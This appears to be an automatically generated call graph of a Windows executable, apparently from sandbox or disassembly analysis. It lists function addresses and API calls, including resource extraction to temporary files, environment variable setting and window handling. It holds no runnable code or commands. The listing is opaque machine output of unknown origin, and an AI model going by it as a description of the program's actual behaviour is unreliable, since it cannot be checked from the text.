8571 4036e4 9417 40de80 GetLastError TlsGetValue SetLastError 8571->9417 9420 40de80 GetLastError TlsGetValue SetLastError 8572->9420 8578 403777 8573->8578 8579 40379d 8573->8579 8585 40365f 8574->8585 8577 403717 9419 40de80 GetLastError TlsGetValue SetLastError 8577->9419 9422 40de80 GetLastError TlsGetValue SetLastError 8578->9422 8593 4037f5 8579->8593 8594 4037a7 8579->8594 8580 40dec0 3 API calls 8645 403636 8580->8645 8589 403692 8581->8589 8595 40dec0 3 API calls 8585->8595 8586 4036b9 8596 40a83a 17 API calls 8586->8596 8600 40dec0 3 API calls 8589->8600 8590 40381f 8601 40e020 4 API calls 8590->8601 8591 4036ec 8602 40a83a 17 API calls 8591->8602 8592 40374a 9421 40de80 GetLastError TlsGetValue SetLastError 8592->9421 9452 40de80 GetLastError TlsGetValue SetLastError 8593->9452 9424 40de80 GetLastError TlsGetValue SetLastError 8594->9424 8595->8645 8597 4036c5 8596->8597 8606 40dec0 3 API calls 8597->8606 8598 40371f 8607 40a83a 17 API calls 8598->8607 8599 40377d 9423 40de80 GetLastError TlsGetValue SetLastError 8599->9423 8600->8645 8609 403827 8601->8609 8610 4036f8 8602->8610 8606->8645 8615 40372b 8607->8615 9388 405170 TlsGetValue 8609->9388 8618 40dec0 3 API calls 8610->8618 8611 403752 8619 40a83a 17 API calls 8611->8619 8612 4037ad 9425 40de80 GetLastError TlsGetValue SetLastError 8612->9425 8613 4037fb 9453 40de80 GetLastError TlsGetValue SetLastError 8613->9453 8623 40dec0 3 API calls 8615->8623 8616 403785 8624 40a83a 17 API calls 8616->8624 8618->8645 8626 40375e 8619->8626 8621 4037b5 9426 409355 8621->9426 8622 403803 8628 40a7f5 5 API calls 8622->8628 8623->8645 8629 403791 8624->8629 8625 40382e 8631 40df50 HeapFree 8625->8631 8630 40dec0 3 API calls 8626->8630 8633 40380a 8628->8633 8634 40dec0 3 API calls 8629->8634 8630->8645 8635 403846 8631->8635 8637 40dec0 3 API calls 8633->8637 8634->8645 8638 40df50 HeapFree 8635->8638 8636 40dec0 3 API calls 8639 4037d0 8636->8639 8637->8564 8640 40384e 8638->8640 8641 4037e9 8639->8641 8642 4037dd 8639->8642 8640->7678 8644 401fa9 36 API calls 8641->8644 9449 405532 8642->9449 8644->8645 8645->8564 8646->7682 8647->7684 8649 40dfc0 21 API calls 8648->8649 8650 402c04 8649->8650 8651 4051a0 3 API calls 8650->8651 8652 402c0d 8651->8652 8653 405060 2 API calls 8652->8653 8654 402c19 8653->8654 8655 409ba0 RtlAllocateHeap 8654->8655 8656 402c23 GetShortPathNameW 8655->8656 9462 40de80 GetLastError TlsGetValue SetLastError 8656->9462 8658 402c3f 9463 40de80 GetLastError TlsGetValue SetLastError 8658->9463 8660 402c47 8661 409c10 5 API calls 8660->8661 8662 402c57 8661->8662 8663 40dec0 3 API calls 8662->8663 8664 402c61 8663->8664 9464 409b80 HeapFree 8664->9464 8666 402c6a 9465 40de80 GetLastError TlsGetValue SetLastError 8666->9465 8668 402c74 8669 40e020 4 API calls 8668->8669 8670 402c7c 8669->8670 9466 405170 TlsGetValue 8670->9466 8672 402c83 8673 40df50 HeapFree 8672->8673 8674 402c9a 8673->8674 8675 40df50 HeapFree 8674->8675 8676 402ca3 8675->8676 8677 40e080 TlsGetValue 8676->8677 8677->7688 8678->7690 8680 404434 8679->8680 8682 4098c7 SetEnvironmentVariableW 8679->8682 8680->7693 8682->8680 8683->7696 8684->7704 8686 40dfc0 21 API calls 8685->8686 8687 401e5f 8686->8687 8688 4051a0 3 API calls 8687->8688 8689 401e68 8688->8689 9467 40de80 GetLastError TlsGetValue SetLastError 8689->9467 8691 401e6e 9468 40de80 GetLastError TlsGetValue SetLastError 8691->9468 8693 401e76 8694 409698 7 API calls 8693->8694 8695 401e7d 8694->8695 8696 40dec0 3 API calls 8695->8696 8697 401e87 PathQuoteSpacesW 8696->8697 8698 401ee0 8697->8698 8699 401e97 8697->8699 9537 40de80 GetLastError TlsGetValue SetLastError 8698->9537 9471 40de80 GetLastError TlsGetValue SetLastError 8699->9471 8702 401e9d 9472 4024f1 8702->9472 8703 401ee9 8705 40e020 4 API calls 8703->8705 8707 401ef1 8705->8707 8709 40dec0 3 API calls 8707->8709 8708 40dec0 3 API calls 8710 401eae 8708->8710 8711 401ede 8709->8711 9536 40de80 GetLastError TlsGetValue SetLastError 8710->9536 9469 40de80 GetLastError TlsGetValue SetLastError 8711->9469 8714 401eb7 8716 40e020 4 API calls 8714->8716 8715 401f05 8717 40e020 4 API calls 8715->8717 8718 401ebf 8716->8718 8719 401f0d 8717->8719 8720 40e020 4 API calls 8718->8720 9470 405170 TlsGetValue 8719->9470 8722 401eca 8720->8722 8724 40e020 4 API calls 8722->8724 8723 401f14 8726 40df50 HeapFree 8723->8726 8725 401ed4 8724->8725 8727 40dec0 3 API calls 8725->8727 8728 401f2b 8726->8728 8727->8711 8729 40df50 HeapFree 8728->8729 8730 401f34 8729->8730 8730->7707 8732 40385b 8731->8732 8732->8732 8733 40dfc0 21 API calls 8732->8733 8751 40386d 8733->8751 8734 4038ee 9568 40de80 GetLastError TlsGetValue SetLastError 8734->9568 8736 4038f4 9569 40de80 GetLastError TlsGetValue SetLastError 8736->9569 8738 4038fc 9570 40de80 GetLastError TlsGetValue SetLastError 8738->9570 8739 405dc0 3 API calls 8739->8751 8741 403904 9571 40de80 GetLastError TlsGetValue SetLastError 8741->9571 8743 40390c 8745 40d100 8 API calls 8743->8745 8744 40de80 GetLastError TlsGetValue SetLastError 8744->8751 8746 40391e 8745->8746 9572 405182 TlsGetValue 8746->9572 8747 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8747->8751 8749 403923 8750 405eb0 6 API calls 8749->8750 8752 40392b 8750->8752 8751->8734 8751->8739 8751->8744 8751->8747 8753 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8751->8753 8754 40dec0 3 API calls 8752->8754 8753->8751 8755 403935 8754->8755 9573 40de80 GetLastError TlsGetValue SetLastError 8755->9573 8757 40393b 9574 40de80 GetLastError TlsGetValue SetLastError 8757->9574 8759 403943 9575 40de80 GetLastError TlsGetValue SetLastError 8759->9575 8761 40394b 9576 40de80 GetLastError TlsGetValue SetLastError 8761->9576 8763 403953 8764 40d100 8 API calls 8763->8764 8765 403965 8764->8765 9577 405182 TlsGetValue 8765->9577 8767 40396a 8768 405eb0 6 API calls 8767->8768 8769 403972 8768->8769 8770 40dec0 3 API calls 8769->8770 8771 40397c 8770->8771 9578 40de80 GetLastError TlsGetValue SetLastError 8771->9578 8773 403982 9579 40de80 GetLastError TlsGetValue SetLastError 8773->9579 8775 40398a 9580 40de80 GetLastError TlsGetValue SetLastError 8775->9580 8777 403992 9581 40de80 GetLastError TlsGetValue SetLastError 8777->9581 8779 40399a 8780 40d100 8 API calls 8779->8780 8781 4039aa 8780->8781 9582 405182 TlsGetValue 8781->9582 8783 4039af 8784 405eb0 6 API calls 8783->8784 8785 4039b7 8784->8785 8786 40dec0 3 API calls 8785->8786 8787 4039c1 8786->8787 9583 40de80 GetLastError TlsGetValue SetLastError 8787->9583 8789 4039c7 9584 40de80 GetLastError TlsGetValue SetLastError 8789->9584 8791 4039cf 9585 40de80 GetLastError TlsGetValue SetLastError 8791->9585 8793 4039d7 9586 40de80 GetLastError TlsGetValue SetLastError 8793->9586 8795 4039df 8796 40d100 8 API calls 8795->8796 8797 4039ef 8796->8797 9587 405182 TlsGetValue 8797->9587 8799 4039f4 8800 405eb0 6 API calls 8799->8800 8801 4039fc 8800->8801 8802 40dec0 3 API calls 8801->8802 8803 403a06 8802->8803 9588 40de80 GetLastError TlsGetValue SetLastError 8803->9588 8805 403a0c 9589 40de80 GetLastError TlsGetValue SetLastError 8805->9589 8807 403a14 9590 40de80 GetLastError TlsGetValue SetLastError 8807->9590 8809 403a1c 9591 40de80 GetLastError TlsGetValue SetLastError 8809->9591 8811 403a24 8812 40d100 8 API calls 8811->8812 8813 403a34 8812->8813 9592 405182 TlsGetValue 8813->9592 8815 403a39 8816 405eb0 6 API calls 8815->8816 8817 403a41 8816->8817 8818 40dec0 3 API calls 8817->8818 8819 403a4b 8818->8819 9593 40de80 GetLastError TlsGetValue SetLastError 8819->9593 8821 403a51 9594 403cd7 8821->9594 8824 4051a0 3 API calls 8825 403a66 8824->8825 9635 40de80 GetLastError TlsGetValue SetLastError 8825->9635 8827 403a6c 8828 403cd7 84 API calls 8827->8828 8829 403a7c 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a88 8830->8831 9636 40de80 GetLastError TlsGetValue SetLastError 8831->9636 8833 403a8e 8834 403cd7 84 API calls 8833->8834 8835 403a9e 8834->8835 8836 40dec0 3 API calls 8835->8836 8837 403aa8 8836->8837 9637 40de80 GetLastError TlsGetValue SetLastError 8837->9637 8839 403aae 8840 403cd7 84 API calls 8839->8840 8841 403abe 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403ac8 8842->8843 9638 40de80 GetLastError TlsGetValue SetLastError 8843->9638 8845 403ace 8846 403cd7 84 API calls 8845->8846 8847 403ade 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403ae8 8848->8849 9639 40de80 GetLastError TlsGetValue SetLastError 8849->9639 8851 403aee 9640 40de80 GetLastError TlsGetValue SetLastError 8851->9640 8853 403af6 9641 40de80 GetLastError TlsGetValue SetLastError 8853->9641 8855 403afe 8856 402bfa 43 API calls 8855->8856 8857 403b0b 8856->8857 9642 40e080 TlsGetValue 8857->9642 8859 403b10 9643 405182 TlsGetValue 8859->9643 8861 403b1f 9644 406650 8861->9644 8864 40dec0 3 API calls 8865 403b32 8864->8865 9647 40de80 GetLastError TlsGetValue SetLastError 8865->9647 8867 403b38 9648 40de80 GetLastError TlsGetValue SetLastError 8867->9648 8869 403b40 9649 40de80 GetLastError TlsGetValue SetLastError 8869->9649 8871 403b48 8872 402bfa 43 API calls 8871->8872 8873 403b55 8872->8873 9650 40e080 TlsGetValue 8873->9650 8875 403b5a 9651 405182 TlsGetValue 8875->9651 8877 403b69 8878 406650 13 API calls 8877->8878 8879 403b72 8878->8879 8880 40dec0 3 API calls 8879->8880 8881 403b7c 8880->8881 9652 40de80 GetLastError TlsGetValue SetLastError 8881->9652 8883 403b82 9653 40de80 GetLastError TlsGetValue SetLastError 8883->9653 8885 403b8e 8886 40e020 4 API calls 8885->8886 8887 403b96 8886->8887 8888 40e020 4 API calls 8887->8888 8889 403ba1 8888->8889 8890 40e020 4 API calls 8889->8890 8891 403bab 8890->8891 8892 40e020 4 API calls 8891->8892 8893 403bb5 8892->8893 8894 40e020 4 API calls 8893->8894 8895 403bbf 8894->8895 9654 40e080 TlsGetValue 8895->9654 8897 403bc4 9655 405182 TlsGetValue 8897->9655 8899 403bcf 9656 40240c 8899->9656 8902 4051a0 3 API calls 8903 403bdd 8902->8903 8904 40df50 HeapFree 8903->8904 8905 403be8 8904->8905 8906 40df50 HeapFree 8905->8906 8907 403bf1 8906->8907 8908 40df50 HeapFree 8907->8908 8909 403bfa 8908->8909 8910 40df50 HeapFree 8909->8910 8911 403c03 8910->8911 8912 40df50 HeapFree 8911->8912 8913 403c0c 8912->8913 8914 40df50 HeapFree 8913->8914 8915 403c15 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403c1e 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403c27 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403c30 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c39 8922->8923 8924 40de80 GetLastError TlsGetValue SetLastError 8923->8924 8924->7712 8925->7718 8926->7734 8979 4054b7 EnterCriticalSection 8978->8979 8980 404502 8978->8980 8985 4054cd 8979->8985 8987 4054fd 8979->8987 8980->7731 8981 40db72 HeapAlloc 8983 405517 LeaveCriticalSection 8981->8983 8982 4054ce WaitForSingleObject 8984 4054de CloseHandle 8982->8984 8982->8985 8983->8980 8985->8982 8985->8987 8987->8981 8989 40dfc0 21 API calls 8988->8989 8990 402cb7 8989->8990 8991 405060 2 API calls 8990->8991 8993 402cc3 8991->8993 9103 40e0e0 9053->9103 9057 402bc7 9056->9057 9057->9057 9058 40dfc0 21 API calls 9057->9058 9059 402bd9 GetNativeSystemInfo 9058->9059 9060 402bec 9059->9060 9060->8203 9060->8204 9061->8230 9062->8237 9064 4055c8 9063->9064 9068 4032bd 9063->9068 9064->9068 9109 405553 memset GetModuleHandleW 9064->9109 9067 405606 GetVersionExW 9067->9068 9068->8204 9069->8212 9070->8216 9072 40e260 3 API calls 9071->9072 9073 4032ef 9072->9073 9073->8222 9074->8227 9075->8243 9076->8258 9112 40d498 EnterCriticalSection 9077->9112 9079 40add5 9080 40ae6e 9079->9080 9081 40addf CreateFileW 9079->9081 9080->8269 9082 40ae00 9081->9082 9083 40ae20 9081->9083 9082->9083 9085 40ae0d HeapAlloc 9082->9085 9086 40ae65 9083->9086 9122 40d40a EnterCriticalSection 9083->9122 9085->9083 9086->8269 9088 40a9e9 9087->9088 9089 40a9da 9087->9089 9133 40d459 EnterCriticalSection 9088->9133 9137 40d9f5 9089->9137 9094 40aa2d 9094->8270 9095 40aa19 CloseHandle 9097 40d40a 4 API calls 9095->9097 9097->9094 9098 40aa08 HeapFree 9098->9095 9099->8277 9100->8279 9101->8211 9102->8215 9104 4032a2 9103->9104 9105 40e0ea wcslen HeapAlloc 9103->9105 9104->8199 9107 40e3a0 9105->9107 9108 40e3b0 9107->9108 9108->9104 9110 40558b 9109->9110 9111 40557b GetProcAddress 9109->9111 9110->9067 9110->9068 9111->9110 9113 40d4b2 9112->9113 9114 40d4c7 9112->9114 9115 40db72 HeapAlloc 9113->9115 9116 40d4ec 9114->9116 9117 40d4cc HeapReAlloc 9114->9117 9118 40d4c1 9115->9118 9119 40d501 HeapAlloc 9116->9119 9120 40d4f5 9116->9120 9117->9116 9121 40d51d LeaveCriticalSection 9118->9121 9119->9120 9120->9121 9121->9079 9123 40d441 9122->9123 9124 40d422 9122->9124 9130 40db32 9123->9130 9124->9123 9126 40d427 9124->9126 9127 40d430 memset 9126->9127 9128 40d44d LeaveCriticalSection 9126->9128 9127->9128 9128->9086 9129 40d44b 9129->9128 9131 40db43 HeapFree 9130->9131 9131->9129 9134 40d472 9133->9134 9135 40d47d LeaveCriticalSection 9133->9135 9134->9135 9136 40a9f6 9135->9136 9136->9094 9136->9095 9143 40aa40 9136->9143 9138 40da02 9137->9138 9139 40a9e5 9137->9139 9146 40db1b EnterCriticalSection 9138->9146 9139->8270 9142 40da08 9142->9139 9147 40dac4 9142->9147 9144 40aa54 WriteFile 9143->9144 9145 40aa7c 9143->9145 9144->9098 9145->9098 9146->9142 9149 40dad0 9147->9149 9148 40db14 9148->9142 9149->9148 9150 40db0a LeaveCriticalSection 9149->9150 9150->9148 9152 409ba8 RtlAllocateHeap 9151->9152 9153 409bba 9151->9153 9152->8303 9153->8303 9168 40e7e0 9154->9168 9156 402f24 9156->8308 9158 40dfc0 21 API calls 9157->9158 9159 4026c1 LoadResource SizeofResource 9158->9159 9160 409ba0 RtlAllocateHeap 9159->9160 9161 4026ee 9160->9161 9187 409c80 memcpy 9161->9187 9163 402705 FreeResource 9164 402715 9163->9164 9165 4046ef 9164->9165 9188 409b60 9165->9188 9167 4046f8 9167->8306 9169 40e7f8 __fprintf_l 9168->9169 9171 40e8aa __fprintf_l 9169->9171 9172 40e950 9169->9172 9171->9156 9173 40f3b2 9172->9173 9177 40e960 __fprintf_l 9172->9177 9173->9169 9174 40ef37 9178 40efa4 __fprintf_l 9174->9178 9179 4104f0 9174->9179 9176 40ee4f memcpy 9176->9177 9177->9173 9177->9174 9177->9176 9178->9169 9180 410504 9179->9180 9181 410572 memcpy 9180->9181 9182 41054c memcpy 9180->9182 9184 41051f 9180->9184 9185 410599 memcpy 9181->9185 9186 4105b8 9181->9186 9182->9178 9184->9178 9185->9178 9186->9178 9187->9163 9189 409b68 HeapSize 9188->9189 9190 409b7a 9188->9190 9189->9167 9190->9167 9191->8321 9192->8329 9193->8320 9194->8324 9195->8328 9196->8332 9198 409c29 9197->9198 9199 409c19 9197->9199 9200 40e260 3 API calls 9198->9200 9299 409bc0 9199->9299 9203 409c3f 9200->9203 9305 40e3f0 TlsGetValue 9203->9305 9205 409c68 9205->8336 9206->8340 9306 405f90 9207->9306 9209 402211 9209->8345 9210->8349 9211->8351 9212->8353 9213->8355 9214->8359 9215->8365 9216->8367 9217->8369 9218->8371 9220 40590f 9219->9220 9227 405801 9219->9227 9316 40e340 TlsGetValue 9220->9316 9222 405918 9222->8373 9223 405886 9225 40e1e0 TlsGetValue 9223->9225 9224 405850 wcsncmp 9224->9227 9226 4058c7 9225->9226 9228 4058e9 9226->9228 9315 40e230 TlsGetValue 9226->9315 9227->9223 9227->9224 9229 40e260 3 API calls 9228->9229 9231 4058f0 9229->9231 9233 405901 9231->9233 9234 4058f6 wcsncpy 9231->9234 9232 4058d7 memmove 9232->9228 9233->8373 9234->9233 9235->8375 9236->8377 9237->8379 9238->8383 9239->8385 9317 408e58 9240->9317 9242 408f81 9243 408e58 3 API calls 9242->9243 9244 408f90 9243->9244 9245 408e58 3 API calls 9244->9245 9246 408fa3 9245->9246 9247 408fb0 GetStockObject 9246->9247 9248 408fbd LoadIconW LoadCursorW RegisterClassExW 9246->9248 9247->9248 9321 4094d1 GetForegroundWindow 9248->9321 9253 409047 IsWindowEnabled 9254 40906b 9253->9254 9255 409052 EnableWindow 9253->9255 9256 4094d1 3 API calls 9254->9256 9255->9254 9257 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9256->9257 9258 4092ba 9257->9258 9259 4090cb SetWindowLongW CreateWindowExW SendMessageW 9257->9259 9260 4092cd 9258->9260 9335 40e340 TlsGetValue 9258->9335 9261 409125 9259->9261 9262 409128 CreateWindowExW SendMessageW SetFocus 9259->9262 9336 408e9a 9260->9336 9261->9262 9264 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9262->9264 9265 40917b SendMessageW wcslen wcslen SendMessageW 9262->9265 9268 40926a 9264->9268 9265->9264 9270 409273 9268->9270 9271 40922e GetMessageW 9268->9271 9269 408e9a HeapFree 9272 4092df 9269->9272 9274 409277 DestroyAcceleratorTable 9270->9274 9275 40927e 9270->9275 9271->9270 9273 409243 TranslateAcceleratorW 9271->9273 9276 408e9a HeapFree 9272->9276 9273->9268 9277 409254 TranslateMessage DispatchMessageW 9273->9277 9274->9275 9275->9258 9278 409285 wcslen 9275->9278 9279 4022e5 9276->9279 9277->9268 9280 40e260 3 API calls 9278->9280 9279->8388 9281 40929c wcscpy HeapFree 9280->9281 9281->9258 9282->8394 9283->8396 9284->8398 9285->8400 9286->8404 9287->8411 9288->8413 9289->8415 9290->8419 9291->8421 9293 4094d1 3 API calls 9292->9293 9294 408e2d 9293->9294 9295 409588 16 API calls 9294->9295 9296 408e36 MessageBoxW 9295->9296 9297 409588 16 API calls 9296->9297 9298 40239f 9297->9298 9298->8424 9300 409bcd 9299->9300 9301 40e260 3 API calls 9300->9301 9302 409beb 9301->9302 9303 409bf1 memcpy 9302->9303 9304 409bff 9302->9304 9303->9304 9304->8336 9305->9205 9309 405fa1 9306->9309 9307 40e1e0 TlsGetValue 9308 406014 9307->9308 9310 40e260 3 API calls 9308->9310 9309->9307 9309->9309 9311 406022 9310->9311 9313 406032 9311->9313 9314 40e370 TlsGetValue 9311->9314 9313->9209 9314->9313 9315->9232 9316->9222 9318 408e60 wcslen HeapAlloc 9317->9318 9319 408e96 9317->9319 9318->9319 9320 408e86 wcscpy 9318->9320 9319->9242 9320->9242 9322 409032 9321->9322 9323 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9321->9323 9324 409588 9322->9324 9323->9322 9325 409592 EnumWindows 9324->9325 9330 4095dd 9324->9330 9326 40903e 9325->9326 9327 4095af 9325->9327 9339 409507 GetWindowThreadProcessId GetCurrentThreadId 9325->9339 9326->9253 9326->9254 9327->9326 9329 4095b1 GetCurrentThreadId 9327->9329 9332 4095c4 SetWindowPos 9327->9332 9328 4095ea GetCurrentThreadId 9328->9330 9329->9327 9330->9326 9330->9328 9331 409600 EnableWindow 9330->9331 9333 409611 SetWindowPos 9330->9333 9334 40db32 HeapFree 9330->9334 9331->9330 9332->9327 9333->9330 9334->9330 9335->9260 9337 408ea1 HeapFree 9336->9337 9338 408eb3 9336->9338 9337->9338 9338->9269 9340 409525 IsWindowVisible 9339->9340 9341 40957f 9339->9341 9340->9341 9342 409530 9340->9342 9343 40db72 HeapAlloc 9342->9343 9344 40953c GetCurrentThreadId GetWindowLongW 9343->9344 9345 40955a 9344->9345 9346 40955e GetForegroundWindow 9344->9346 9345->9346 9346->9341 9347 409568 IsWindowEnabled 9346->9347 9347->9341 9348 409573 EnableWindow 9347->9348 9348->9341 9349->8435 9350->8438 9352 40e260 3 API calls 9351->9352 9353 40a769 GetTempPathW LoadLibraryW 9352->9353 9354 40a7a4 9353->9354 9355 40a786 GetProcAddress 9353->9355 9377 40e3f0 TlsGetValue 9354->9377 9356 40a796 GetLongPathNameW 9355->9356 9357 40a79d FreeLibrary 9355->9357 9356->9357 9357->9354 9359 401a0d 9359->8441 9360->8445 9361->8447 9378 40a7b9 9362->9378 9365 40a6c5 9366 40a6d4 wcsncpy wcslen 9365->9366 9367 401a6a GetTempFileNameW 9365->9367 9368 40a708 CreateDirectoryW 9366->9368 9370 40de80 GetLastError TlsGetValue SetLastError 9367->9370 9368->9367 9370->8458 9371->8460 9372->8470 9373->8472 9374->8480 9375->8482 9376->8488 9377->9359 9379 40a7c0 9378->9379 9380 401a5f 9378->9380 9381 40a7d6 DeleteFileW 9379->9381 9382 40a7c7 SetFileAttributesW 9379->9382 9380->9365 9381->9380 9382->9381 9383->8501 9385 40a961 SetCurrentDirectoryW 9384->9385 9386 4046cb 9384->9386 9385->9386 9386->8509 9387->8590 9388->8625 9389->8533 9390->8544 9391->8534 9392->8543 9393->8552 9395 40e260 3 API calls 9394->9395 9396 40a84f 9395->9396 9397 40a85e LoadLibraryW 9396->9397 9403 40a8e9 9396->9403 9398 40a8cb 9397->9398 9399 40a86f GetProcAddress 9397->9399 9454 40a96c SHGetFolderLocation 9398->9454 9400 40a8c0 FreeLibrary 9399->9400 9407 40a884 9399->9407 9400->9398 9408 40a91b 9400->9408 9404 40a96c 4 API calls 9403->9404 9403->9408 9404->9408 9405 40362c 9405->8580 9407->9400 9409 40a896 wcscpy wcscat wcslen CoTaskMemFree 9407->9409 9460 40e3f0 TlsGetValue 9408->9460 9409->9400 9410->8547 9411->8565 9412->8554 9413->8570 9414->8566 9415->8586 9416->8571 9417->8591 9418->8577 9419->8598 9420->8592 9421->8611 9422->8599 9423->8616 9424->8612 9425->8621 9427 409368 CoInitialize 9426->9427 9428 409379 memset LoadLibraryW 9426->9428 9427->9428 9429 4093a3 GetProcAddress GetProcAddress 9428->9429 9430 4094ab 9428->9430 9431 4093d2 wcsncpy wcslen 9429->9431 9432 4093cd 9429->9432 9433 40e260 3 API calls 9430->9433 9434 409401 9431->9434 9432->9431 9435 4094b8 9433->9435 9436 4094d1 3 API calls 9434->9436 9461 40e3f0 TlsGetValue 9435->9461 9437 40941f 9436->9437 9439 409588 16 API calls 9437->9439 9441 409442 9439->9441 9440 4037c6 9440->8636 9442 409588 16 API calls 9441->9442 9443 409457 9442->9443 9444 40949f FreeLibrary 9443->9444 9445 40e260 3 API calls 9443->9445 9444->9430 9444->9435 9446 409468 CoTaskMemFree wcslen 9445->9446 9446->9444 9448 409493 9446->9448 9448->9444 9450 40553b timeBeginPeriod 9449->9450 9451 40554d Sleep 9449->9451 9450->9451 9452->8613 9453->8622 9455 40a98b SHGetPathFromIDListW 9454->9455 9456 40a8d3 wcscat wcslen 9454->9456 9457 40a9b5 CoTaskMemFree 9455->9457 9458 40a999 wcslen 9455->9458 9456->9408 9457->9456 9458->9457 9459 40a9a6 9458->9459 9459->9457 9460->9405 9461->9440 9462->8658 9463->8660 9464->8666 9465->8668 9466->8672 9467->8691 9468->8693 9469->8715 9470->8723 9471->8702 9473 4024f7 9472->9473 9473->9473 9474 40dfc0 21 API calls 9473->9474 9475 402509 9474->9475 9476 4051a0 3 API calls 9475->9476 9495 402512 9476->9495 9477 402593 9538 40de80 GetLastError TlsGetValue SetLastError 9477->9538 9479 402599 9539 40de80 GetLastError TlsGetValue SetLastError 9479->9539 9481 4025a1 GetCommandLineW 9483 409bc0 4 API calls 9481->9483 9482 405dc0 3 API calls 9482->9495 9484 4025ae 9483->9484 9486 40dec0 3 API calls 9484->9486 9485 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9485->9495 9487 4025b8 9486->9487 9540 40de80 GetLastError TlsGetValue SetLastError 9487->9540 9488 40de80 GetLastError TlsGetValue SetLastError 9488->9495 9490 4025c2 9491 40e020 4 API calls 9490->9491 9492 4025ca 9491->9492 9493 40dec0 3 API calls 9492->9493 9496 4025d4 PathRemoveArgsW 9493->9496 9494 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9494->9495 9495->9477 9495->9482 9495->9485 9495->9488 9495->9494 9497 4025eb 9496->9497 9498 402651 9497->9498 9541 40de80 GetLastError TlsGetValue SetLastError 9497->9541 9500 4098c0 SetEnvironmentVariableW 9498->9500 9502 40265e 9500->9502 9501 4025fd 9503 40e020 4 API calls 9501->9503 9554 40de80 GetLastError TlsGetValue SetLastError 9502->9554 9505 40260a 9503->9505 9542 40de80 GetLastError TlsGetValue SetLastError 9505->9542 9506 402668 9508 40e020 4 API calls 9506->9508 9510 402670 9508->9510 9509 402610 9543 40de80 GetLastError TlsGetValue SetLastError 9509->9543 9555 405170 TlsGetValue 9510->9555 9513 402677 9516 40df50 HeapFree 9513->9516 9514 402618 9544 40de80 GetLastError TlsGetValue SetLastError 9514->9544 9518 40268f 9516->9518 9517 402620 9545 40de80 GetLastError TlsGetValue SetLastError 9517->9545 9521 40df50 HeapFree 9518->9521 9520 402628 9546 406110 9520->9546 9523 402698 9521->9523 9525 40df50 HeapFree 9523->9525 9524 402639 9553 405182 TlsGetValue 9524->9553 9527 4026a1 9525->9527 9529 40df50 HeapFree 9527->9529 9528 40263e 9530 406060 5 API calls 9528->9530 9531 4026aa 9529->9531 9532 402646 9530->9532 9533 40df50 HeapFree 9531->9533 9534 40dec0 3 API calls 9532->9534 9535 401ea4 9533->9535 9534->9498 9535->8708 9536->8714 9537->8703 9538->9479 9539->9481 9540->9490 9541->9501 9542->9509 9543->9514 9544->9517 9545->9520 9547 406146 9546->9547 9549 406118 9546->9549 9565 40e340 TlsGetValue 9547->9565 9549->9549 9556 406080 9549->9556 9550 40614f 9550->9524 9553->9528 9554->9506 9555->9513 9557 40e1e0 TlsGetValue 9556->9557 9558 40609c 9557->9558 9559 40e260 3 API calls 9558->9559 9560 4060a8 9559->9560 9561 4060b4 9560->9561 9566 40e370 TlsGetValue 9560->9566 9567 40e3f0 TlsGetValue 9561->9567 9564 4060fd 9564->9524 9565->9550 9566->9561 9567->9564 9568->8736 9569->8738 9570->8741 9571->8743 9572->8749 9573->8757 9574->8759 9575->8761 9576->8763 9577->8767 9578->8773 9579->8775 9580->8777 9581->8779 9582->8783 9583->8789 9584->8791 9585->8793 9586->8795 9587->8799 9588->8805 9589->8807 9590->8809 9591->8811 9592->8815 9593->8821 9595 40dfc0 21 API calls 9594->9595 9596 403ce3 9595->9596 9597 4051a0 3 API calls 9596->9597 9598 403cec 9597->9598 9599 405060 2 API calls 9598->9599 9600 403cf8 FindResourceW 9599->9600 9601 403db3 9600->9601 9602 403d1b 9600->9602 9724 40de80 GetLastError TlsGetValue SetLastError 9601->9724 9603 4026b8 26 API calls 9602->9603 9605 403d2a 9603->9605 9607 4046ef HeapSize 9605->9607 9606 403dbd 9608 40e020 4 API calls 9606->9608 9609 403d37 9607->9609 9610 403dc5 9608->9610 9671 4011de 9609->9671 9725 405170 TlsGetValue 9610->9725 9614 403dcc 9617 40df50 HeapFree 9614->9617 9615 403d5a 9695 4046ff 9615->9695 9616 403d7c 9711 40de80 GetLastError TlsGetValue SetLastError 9616->9711 9620 403de3 9617->9620 9623 40df50 HeapFree 9620->9623 9622 403d82 9712 40de80 GetLastError TlsGetValue SetLastError 9622->9712 9626 403a61 9623->9626 9626->8824 9627 403d7a 9726 40e0b0 TlsGetValue 9627->9726 9628 403d8a 9713 409cb0 9628->9713 9630 403da0 9632 40dec0 3 API calls 9630->9632 9633 403daa 9632->9633 9723 409b80 HeapFree 9633->9723 9635->8827 9636->8833 9637->8839 9638->8845 9639->8851 9640->8853 9641->8855 9642->8859 9643->8861 9803 406310 9644->9803 9646 403b28 9646->8864 9647->8867 9648->8869 9649->8871 9650->8875 9651->8877 9652->8883 9653->8885 9654->8897 9655->8899 9657 405060 2 API calls 9656->9657 9658 40241f 9657->9658 9659 405060 2 API calls 9658->9659 9660 40242c 9659->9660 9833 40acb0 9660->9833 9664 402457 9665 40a9d0 11 API calls 9664->9665 9666 402464 9665->9666 9667 40df50 HeapFree 9666->9667 9668 40248b 9667->9668 9669 40df50 HeapFree 9668->9669 9670 402494 9669->9670 9670->8902 9672 4011e6 9671->9672 9672->9672 9673 405060 2 API calls 9672->9673 9674 4011ff 9673->9674 9727 405700 9674->9727 9677 409b60 HeapSize 9678 401214 9677->9678 9679 40dbca 4 API calls 9678->9679 9680 401236 9679->9680 9681 40dbca 4 API calls 9680->9681 9682 401254 9681->9682 9683 40dbca 4 API calls 9682->9683 9684 4014ac 9683->9684 9685 40dbca 4 API calls 9684->9685 9686 4014ca 9685->9686 9734 409b80 HeapFree 9686->9734 9688 4014d3 9689 40df50 HeapFree 9688->9689 9690 4014e3 9689->9690 9691 40dd1d 2 